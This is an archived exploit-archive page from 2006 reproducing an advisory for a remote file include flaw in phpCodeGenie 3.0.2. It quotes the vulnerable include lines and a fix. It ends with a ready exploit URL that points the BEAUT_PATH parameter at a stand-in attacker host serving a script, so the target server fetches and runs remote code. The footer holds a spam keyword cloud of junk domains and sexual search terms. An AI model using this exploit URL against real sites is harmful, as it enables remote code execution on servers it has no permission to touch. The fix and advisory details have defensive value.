about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , phpCodeGenie <= 3.0.2 (BEAUT_PATH) Remote File Include Vulnerability



2006-08-18 phpCodeGenie <= 3.0.2 (BEAUT_PATH) Remote File Include Vulnerability
Rated as : High Risk

/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- phpCodeGenie <= 3.0.2 (BEAUT_PATH) Remote File Include Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: phpCodeGenie v. 3.0.2
- [Script site: http://sourceforge.net/projects/phpcodegenie/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-          Find by: Kacper (a.k.a Rahim)
+
-          Contact: kacper1964@yahoo.pl
-                        or
-          http://www.devilteam.yum.pl/
-                       and
-           http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi
-
!@ Przyjazni nie da sie zamienic na marne korzysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-            Z Dedykacja dla osoby,
-         bez ktorej nie mogl bym zyc...
-           K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
/*
+++++++++++++++++++++START+++++++++++++++++++++++
vulnerable code => app/common/lib/codeBeautifier/Beautifier/Core.php
line 20-25:
....

include_once($BEAUT_PATH."/Beautifier/HFile.php");
include_once($BEAUT_PATH."/Beautifier/Context.php");

class Core
{
....
+++++++++++++++++++++++++++++++++++++++++++++++++
*/
/*
+++++++++++++++++++++FIX+++++++++++++++++++++++++
app/common/lib/codeBeautifier/Beautifier/Core.php line 20-25:
....
$BEAUT_PATH = LIB_COMPONENT.FILE_SEPARATOR."codeBeautifier";
include_once($BEAUT_PATH."/Beautifier/HFile.php");
include_once($BEAUT_PATH."/Beautifier/Context.php");

class Core
{
....
++++++++++++++++++++THE+END++++++++++++++++++++++
*/
#Exploit:

http://www.site.com/[phpCodeGenie_path]/app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=[http://www.myevilsite.com/evil_scripts.txt]
securitydot.net - 2006-08-18

Advertising

Copyright 2007, SecurityDot
Tue, 08 Dec 2009 22:18:35 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.biz56. www.yuotob 88kj.net +...t%252F Movie loli r s s Pic fat se vulnerabil joomla com www.3pic.c FreeDownlo www.yewu5. cat pornor sex insex www.sexse. sex with a wwwxxoxo sleepless www.xxl.ko sexyfilim free games Adobe Read 802.11 exp www.Bio ma www.czggtg cms is fre red hat 200 /compo prctlpute porna vidi zhyzlh.com mambo remo big boobs sexvedioe www.biyici www.sexcom sex mobile www.bingop www.i9yao. WWW.DewiPe MSN MEsseg ok0303.cn SAXY GIRL www.bilcc. 6669678.cn pic soyunma se smf 1.1 www.omvx.c Garlandgar